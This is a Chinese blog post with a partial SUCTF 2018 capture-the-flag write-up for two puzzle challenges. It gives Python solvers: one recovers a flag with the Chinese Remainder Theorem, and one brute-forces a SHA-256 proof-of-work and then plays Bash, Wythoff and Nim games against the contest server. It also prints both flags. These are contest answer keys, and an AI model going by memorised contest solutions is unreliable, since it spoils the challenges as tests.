<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF,Writeup," />








  <link rel="shortcut icon" type="image/x-icon" href="https://github.com/Windylh/image/raw/master/icon.ico?v=5.1.0" />






<meta name="description" content="MiscSandGame1234567891011import flagflag = flag.flagsands = int(flag[5:-1].encode(&quot;hex&quot;), 16)holes = [257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373">
<meta property="og:type" content="article">
<meta property="og:title" content="SUCTF2018部分Writeup">
<meta property="og:url" content="http://yoursite.com/2018/11/01/SUCTF2018部分Writeup/index.html">
<meta property="og:site_name" content="Windylh's blog">
<meta property="og:description" content="MiscSandGame1234567891011import flagflag = flag.flagsands = int(flag[5:-1].encode(&quot;hex&quot;), 16)holes = [257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373">
<meta property="og:updated_time" content="2018-11-01T00:55:31.077Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SUCTF2018部分Writeup">
<meta name="twitter:description" content="MiscSandGame1234567891011import flagflag = flag.flagsands = int(flag[5:-1].encode(&quot;hex&quot;), 16)holes = [257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/01/SUCTF2018部分Writeup/"/>





  <title> SUCTF2018部分Writeup | Windylh's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Windylh's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/01/SUCTF2018部分Writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Windylh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Windylh's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                SUCTF2018部分Writeup
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-01T16:11:12+08:00">
                2018-11-01
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2018/11/01/SUCTF2018部分Writeup/" class="leancloud_visitors" data-flag-title="SUCTF2018部分Writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="SandGame"><a href="#SandGame" class="headerlink" title="SandGame"></a>SandGame</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> flag</div><div class="line"></div><div class="line">flag = flag.flag</div><div class="line">sands = int(flag[<span class="number">5</span>:<span class="number">-1</span>].encode(<span class="string">"hex"</span>), <span class="number">16</span>)</div><div class="line"></div><div class="line">holes = [<span class="number">257</span>, <span class="number">263</span>, <span class="number">269</span>, <span class="number">271</span>, <span class="number">277</span>, <span class="number">281</span>, <span class="number">283</span>, <span class="number">293</span>, <span class="number">307</span>, <span class="number">311</span>, <span class="number">313</span>, <span class="number">317</span>, <span class="number">331</span>, <span class="number">337</span>, <span class="number">347</span>, <span class="number">349</span>, <span class="number">353</span>, <span class="number">359</span>, <span class="number">367</span>, <span class="number">373</span>]</div><div class="line"></div><div class="line"><span class="keyword">with</span> open(<span class="string">"sand.txt"</span>, <span class="string">"w"</span>) <span class="keyword">as</span> f:</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(holes)):</div><div class="line">        sand = sands % holes[i]</div><div class="line">        f.write(str(sand)+<span class="string">"\n"</span>)</div></pre></td></tr></table></figure>
<a id="more"></a>
<p>flag被转化为16进制,并和20个互素的数字取模，符合中国剩余定理的条件。</p>
<p><a href="https://baike.baidu.com/item/%E5%AD%99%E5%AD%90%E5%AE%9A%E7%90%86/2841597" target="_blank" rel="external">中国剩余定理</a></p>
<p>python解题脚本：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># coding: UTF-8</span></div><div class="line"><span class="keyword">import</span> binascii</div><div class="line"><span class="comment">#gcd,求最大公约数函数，递归算法，有了扩展欧几里得算法之后，此函数可以不用  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">_g_c_d</span><span class="params">(a,b)</span>:</span>  </div><div class="line">  <span class="keyword">if</span> <span class="number">0</span>==b:  </div><div class="line">    <span class="keyword">return</span> a  </div><div class="line">  <span class="keyword">return</span> gcd(b,a%b)  </div><div class="line">  </div><div class="line"><span class="comment">#扩展欧几里得算法,返回值列表中,x是a的逆元(mod b),q是gcd(a,b),若x是0,则表示没有逆元  </span></div><div class="line"><span class="comment">#y是计算过程中的迭代的参数,可以不用管  </span></div><div class="line"><span class="comment">#此算法实质上是广义欧几里得除法的逆运算,用递归可以体现出这个逆运算的过程  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Ex_Euclid</span><span class="params">(a,b)</span>:</span>  </div><div class="line">  <span class="keyword">if</span> <span class="number">0</span>==b:  </div><div class="line">    x=<span class="number">1</span>;y=<span class="number">0</span>;q=a  </div><div class="line">    <span class="keyword">return</span> x,y,q  </div><div class="line">  xyq=Ex_Euclid(b,a%b)  </div><div class="line">  x=xyq[<span class="number">0</span>];y=xyq[<span class="number">1</span>];q=xyq[<span class="number">2</span>]  </div><div class="line">  temp=x;x=y;y=temp-a//b*y  </div><div class="line">  <span class="keyword">return</span> x,y,q  </div><div class="line">  </div><div class="line"><span class="comment">#获取a的逆元(mod b)的函数，目的是为了封装获取逆元的功能  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Get_Inverse</span><span class="params">(a,b)</span>:</span>  </div><div class="line">  <span class="keyword">return</span> Ex_Euclid(a,b)[<span class="number">0</span>]  </div><div class="line">  </div><div class="line"><span class="comment">#获取a和b的最大公约数函数，目的是为了封装获取最大公约数的功能  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">gcd</span><span class="params">(a,b)</span>:</span>  </div><div class="line">  <span class="keyword">return</span> Ex_Euclid(a,b)[<span class="number">2</span>]  </div><div class="line">  </div><div class="line"><span class="comment">#判断所有的mi是否两两互质  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Is_Coprime</span><span class="params">(m_list)</span>:</span>  </div><div class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> range(len(m_list)):  </div><div class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(i+<span class="number">1</span>,len(m_list)):  </div><div class="line">      <span class="keyword">if</span> <span class="number">1</span>!=gcd(m_list[i],m_list[j]):  </div><div class="line">        <span class="keyword">return</span> <span class="number">0</span>  <span class="comment">#返回0表示不是两两互质的  </span></div><div class="line">  <span class="keyword">return</span> <span class="number">1</span>  <span class="comment">#返回1表示是两两互质的  </span></div><div class="line">  </div><div class="line"><span class="comment">#获取所有的Mi  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Get_Mi</span><span class="params">(m_list,M)</span>:</span>  </div><div class="line">  Mi_list=[]  </div><div class="line">  <span class="keyword">for</span> mi <span class="keyword">in</span> m_list:  </div><div class="line">    Mi_list.append(M//mi)  </div><div class="line">  <span class="keyword">return</span> Mi_list  </div><div class="line">  </div><div class="line"><span class="comment">#获取所有的Mi的逆元  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">Get_Mi_inverse</span><span class="params">(Mi_list,m_list)</span>:</span>  </div><div class="line">  Mi_inverse=[]  </div><div class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> range(len(Mi_list)):  </div><div class="line">    Mi_inverse.append(Get_Inverse(Mi_list[i],m_list[i]))  </div><div class="line">  <span class="keyword">return</span> Mi_inverse  </div><div class="line">  </div><div class="line"><span class="comment">#中国剩余定理,返回值为最终的x  </span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">C_R_T</span><span class="params">()</span>:</span>  </div><div class="line">  <span class="keyword">while</span> <span class="keyword">True</span>:  </div><div class="line">    <span class="comment">#两个列表，分别用来保存mi和bi  </span></div><div class="line">    m_list=[<span class="number">257</span>, <span class="number">263</span>, <span class="number">269</span>, <span class="number">271</span>, <span class="number">277</span>, <span class="number">281</span>, <span class="number">283</span>, <span class="number">293</span>, <span class="number">307</span>, <span class="number">311</span>, <span class="number">313</span>, <span class="number">317</span>, <span class="number">331</span>, <span class="number">337</span>, <span class="number">347</span>, <span class="number">349</span>, <span class="number">353</span>, <span class="number">359</span>, <span class="number">367</span>, <span class="number">373</span>]</div><div class="line">    b_list=[<span class="number">222</span>, <span class="number">203</span>, <span class="number">33</span>, <span class="number">135</span>, <span class="number">203</span>, <span class="number">62</span>, <span class="number">227</span>, <span class="number">82</span>, <span class="number">239</span>, <span class="number">82</span>, <span class="number">11</span>, <span class="number">220</span>, <span class="number">74</span>, <span class="number">92</span>, <span class="number">8</span>, <span class="number">308</span>, <span class="number">195</span>, <span class="number">165</span>, <span class="number">87</span>, <span class="number">4</span>]</div><div class="line">    </div><div class="line">  M=<span class="number">1</span> <span class="comment">#M是所有mi的乘积  </span></div><div class="line">  <span class="keyword">for</span> mi <span class="keyword">in</span> m_list:  </div><div class="line">    M*=mi  </div><div class="line">  Mi_list=Get_Mi(m_list,M)  </div><div class="line">  Mi_inverse=Get_Mi_inverse(Mi_list,m_list)  </div><div class="line">  x=<span class="number">0</span>  </div><div class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> range(len(b_list)):  <span class="comment">#开始计算x  </span></div><div class="line">    x+=Mi_list[i]*Mi_inverse[i]*b_list[i]  </div><div class="line">    x%=M  </div><div class="line">  <span class="keyword">return</span> x  </div><div class="line">  </div><div class="line"><span class="keyword">if</span> __name__==<span class="string">'__main__'</span>:  </div><div class="line">  solve = C_R_T()</div><div class="line">  print(solve)</div></pre></td></tr></table></figure></p>
<p>输出16进制的flag，转化为ascii字符串。</p>
<p><code>flag{This_is_the_CRT_xwg)}</code></p>
<h3 id="Game"><a href="#Game" class="headerlink" title="Game"></a>Game</h3><p>一道博弈论题目，开头sha256爆破，之后是三种经典博弈<code>巴什博奕，威佐夫博弈，尼姆博弈</code></p>
<p>脚本写的很丑。。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</div><div class="line"><span class="keyword">import</span> hashlib</div><div class="line"><span class="keyword">import</span> itertools <span class="keyword">as</span> its</div><div class="line"><span class="keyword">import</span> re</div><div class="line"><span class="keyword">import</span> math</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(strr,hash1)</span>:</span></div><div class="line">    s=<span class="string">r'1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm'</span></div><div class="line">    r=its.product(s,repeat=<span class="number">4</span>)</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> r:</div><div class="line">        st = <span class="string">""</span>.join(i)</div><div class="line">        s = strr+st</div><div class="line">        mst=hashlib.sha256(s).hexdigest()</div><div class="line">        <span class="keyword">if</span>(mst==hash1):</div><div class="line">            <span class="keyword">return</span> st</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">bashgame</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">global</span> rec</div><div class="line">    n= int(re.findall(<span class="string">"are (.*?) stones"</span>,rec)[<span class="number">0</span>])</div><div class="line">    k= int(re.findall(<span class="string">"pick 1 - (.*?) once"</span>,rec)[<span class="number">0</span>])</div><div class="line"></div><div class="line">    r = n%(<span class="number">1</span>+k)</div><div class="line">    <span class="keyword">if</span> r==<span class="number">0</span>:</div><div class="line">        sh.sendline(<span class="string">'GG'</span>)</div><div class="line">        rec = sh.recvuntil(<span class="string">'Your turn: \n'</span>)</div><div class="line">        <span class="keyword">print</span> rec</div><div class="line">        <span class="keyword">return</span> </div><div class="line">    <span class="keyword">print</span> r</div><div class="line">    <span class="comment">#print sh.recv(1024)</span></div><div class="line"></div><div class="line">    sh.sendline(str(r))</div><div class="line">    <span class="comment">#print sh.recv()</span></div><div class="line">    <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">        rec = sh.recvuntil(<span class="string">'Your turn: \n'</span>)</div><div class="line">        <span class="keyword">print</span> rec</div><div class="line">        <span class="keyword">if</span> <span class="string">"You win!"</span> <span class="keyword">in</span> rec:</div><div class="line">            <span class="keyword">break</span></div><div class="line">        x = re.findall(<span class="string">"I pick (.*?)!"</span>,rec)[<span class="number">0</span>]</div><div class="line">        sss= <span class="number">1</span>+k-int(x)</div><div class="line">        <span class="keyword">print</span> sss</div><div class="line">        sh.sendline(str(sss))</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">wythoffgame</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">global</span> rec</div><div class="line">    <span class="keyword">while</span>(<span class="number">1</span>):</div><div class="line">        flag=<span class="keyword">False</span></div><div class="line">        a = int(re.findall(<span class="string">"Piles: (.*?) (.*?)\n"</span>,rec)[<span class="number">0</span>][<span class="number">0</span>])</div><div class="line">        b = int(re.findall(<span class="string">"Piles: (.*?) (.*?)\n"</span>,rec)[<span class="number">0</span>][<span class="number">1</span>])</div><div class="line">        <span class="keyword">if</span>(a==<span class="number">0</span>):</div><div class="line">            sh.sendline(str(b)+<span class="string">' 1'</span>)</div><div class="line">            print(<span class="string">"a==0"</span>)</div><div class="line">            <span class="keyword">return</span></div><div class="line">        <span class="keyword">if</span>(b==<span class="number">0</span>):</div><div class="line">            sh.sendline(str(a)+<span class="string">' 0'</span>)</div><div class="line">            print(<span class="string">"b==0"</span>)</div><div class="line">            <span class="keyword">return</span></div><div class="line">        <span class="keyword">if</span>(a==b):</div><div class="line">            sh.sendline(str(a)+<span class="string">' 2'</span>)</div><div class="line">            print(<span class="string">"a==b"</span>)</div><div class="line">            <span class="keyword">return</span></div><div class="line">        <span class="keyword">if</span>(a&gt;b):</div><div class="line">            a,b=b,a</div><div class="line">            flag=<span class="keyword">True</span></div><div class="line">        k = int(<span class="number">2</span>*a/((<span class="number">1</span>+math.sqrt(<span class="number">5.0</span>)))+<span class="number">1</span>)</div><div class="line">        ak = int(k*(<span class="number">1</span>+math.sqrt(<span class="number">5</span>))/<span class="number">2</span>)</div><div class="line">        <span class="keyword">if</span>(ak!=a):</div><div class="line">            k = int(<span class="number">2</span>*b/((<span class="number">3</span>+math.sqrt(<span class="number">5.0</span>)))+<span class="number">1</span>)</div><div class="line">            ak = int(k*(<span class="number">1</span>+math.sqrt(<span class="number">5</span>))/<span class="number">2</span>)</div><div class="line">        bk = ak+k</div><div class="line">        <span class="keyword">print</span> a,b,k,ak,bk</div><div class="line">        </div><div class="line">        <span class="keyword">if</span>(abs(a-b)==k <span class="keyword">and</span> a==ak):</div><div class="line">            sh.sendline(<span class="string">'GG'</span>)</div><div class="line">            print(<span class="string">"GG"</span>)</div><div class="line">            <span class="keyword">return</span> </div><div class="line">        <span class="keyword">if</span>(a==ak <span class="keyword">and</span> b&gt;bk):</div><div class="line">            <span class="keyword">if</span> flag:</div><div class="line">                <span class="keyword">print</span> b-bk</div><div class="line">                sh.sendline(str(b-bk)+<span class="string">' 0'</span>)</div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">print</span> b-bk</div><div class="line">                sh.sendline(str(b-bk)+<span class="string">' 1'</span>)</div><div class="line">        <span class="keyword">elif</span>(a&gt;ak <span class="keyword">and</span> b==bk):</div><div class="line">            <span class="keyword">if</span> flag:</div><div class="line">                <span class="keyword">print</span> a-ak</div><div class="line">                sh.sendline(str(a-ak)+<span class="string">' 1'</span>)</div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">print</span> a-ak</div><div class="line">                sh.sendline(str(a-ak)+<span class="string">' 0'</span>)</div><div class="line">        <span class="keyword">elif</span>(a==ak <span class="keyword">and</span> b&lt;bk):</div><div class="line">            tmp=a-int((b-a)*(<span class="number">1</span>+math.sqrt(<span class="number">5</span>))/<span class="number">2</span>)</div><div class="line">            <span class="keyword">print</span> tmp</div><div class="line">            sh.sendline(str(tmp)+<span class="string">' 2'</span>)</div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">while</span>(k):</div><div class="line">                k-=<span class="number">1</span></div><div class="line">                aj=int((k)*(<span class="number">1</span>+math.sqrt(<span class="number">5</span>))/<span class="number">2</span>)</div><div class="line">                bj=int((k)*(<span class="number">3</span>+math.sqrt(<span class="number">5</span>))/<span class="number">2</span>)</div><div class="line">                <span class="keyword">if</span>(a==bj):</div><div class="line">                    tmp=b-aj</div><div class="line">                    <span class="keyword">if</span>(flag):</div><div class="line">                        sh.sendline(str(tmp)+<span class="string">' 0'</span>)</div><div class="line">                        <span class="keyword">print</span> tmp</div><div class="line">                    <span class="keyword">else</span>:</div><div class="line">                        sh.sendline(str(tmp)+<span class="string">' 1'</span>)</div><div class="line">                        <span class="keyword">print</span> tmp</div><div class="line">        rec = sh.recvuntil(<span class="string">'Your turn: \n'</span>)</div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">nimmgame</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">while</span>(<span class="number">1</span>):</div><div class="line">        rec=sh.recvline()</div><div class="line">        <span class="keyword">print</span> rec</div><div class="line">        num = re.findall(<span class="string">"Piles: (.*?) (.*?) (.*?) (.*?) (.*?)\n"</span>,rec)[<span class="number">0</span>]</div><div class="line">        a=[]</div><div class="line">        ans=<span class="number">0</span></div><div class="line">        flag=<span class="keyword">False</span></div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(len(num)):</div><div class="line">            a.append(int(num[i]))</div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</div><div class="line">            ans=ans^a[i]</div><div class="line">        <span class="keyword">if</span>(ans==<span class="number">0</span>):</div><div class="line">            sh.sendline(<span class="string">'GG'</span>)</div><div class="line">            <span class="keyword">print</span> <span class="string">'GG'</span></div><div class="line">            <span class="keyword">return</span> </div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</div><div class="line">            <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0</span>,a[i]+<span class="number">1</span>):</div><div class="line">                ans=j</div><div class="line">                <span class="keyword">for</span> k <span class="keyword">in</span> range(len(a)):</div><div class="line">                    <span class="keyword">if</span>(k==i):</div><div class="line">                        <span class="keyword">continue</span></div><div class="line">                    <span class="keyword">else</span>:</div><div class="line">                        ans=ans^a[k]</div><div class="line">                <span class="keyword">if</span>(ans==<span class="number">0</span>):</div><div class="line">                    <span class="keyword">print</span> a[i]-j,i</div><div class="line">                    sh.sendline(str(a[i]-j)+<span class="string">' '</span>+str(i))</div><div class="line">                    flag=<span class="keyword">True</span></div><div class="line">                <span class="keyword">if</span>(flag):</div><div class="line">                    <span class="keyword">break</span></div><div class="line">            <span class="keyword">if</span>(flag):</div><div class="line">                <span class="keyword">break</span></div><div class="line">        rec=sh.recvline()</div><div class="line">        <span class="keyword">if</span>(<span class="string">'You win!'</span> <span class="keyword">in</span> rec):</div><div class="line">            <span class="keyword">return</span> </div><div class="line">     </div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    sh =remote(<span class="string">'game.suctf.asuri.org'</span>,<span class="number">10000</span>)</div><div class="line">    sh.recvuntil(<span class="string">'Prove your heart!'</span>)</div><div class="line">    ch =  sh.recv(<span class="number">1024</span>)</div><div class="line">    strr = ch[<span class="number">8</span>:<span class="number">20</span>]</div><div class="line">    hash1=ch[<span class="number">32</span>:<span class="number">-1</span>]</div><div class="line">    che=check(strr,hash1)</div><div class="line">    sh.sendline(che)</div><div class="line">    sh.recvuntil(<span class="string">'skip'</span>)</div><div class="line">    rec = sh.recvuntil(<span class="string">'Your turn: \n'</span>)</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">20</span>):</div><div class="line">        bashgame()</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">20</span>):</div><div class="line">        wythoffgame()</div><div class="line">        <span class="keyword">if</span>(i==<span class="number">19</span>):</div><div class="line">            rec = sh.recvuntil(<span class="string">'Round 1\n'</span>)</div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            rec = sh.recvuntil(<span class="string">'Your turn: \n'</span>)</div><div class="line">        <span class="keyword">print</span> rec</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">20</span>):</div><div class="line">        nimmgame()</div><div class="line">        <span class="keyword">if</span>(i==<span class="number">19</span>):</div><div class="line">            <span class="keyword">print</span> sh.recvall()</div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">print</span> sh.recvuntil(<span class="string">"Round %s\n"</span>%str(i+<span class="number">2</span>))</div></pre></td></tr></table></figure></p>
<p><code>SUCTF{gGGGGggGgGggGGggGGGggGgGgggGGGGGggggggGgGggggGg}</code></p>
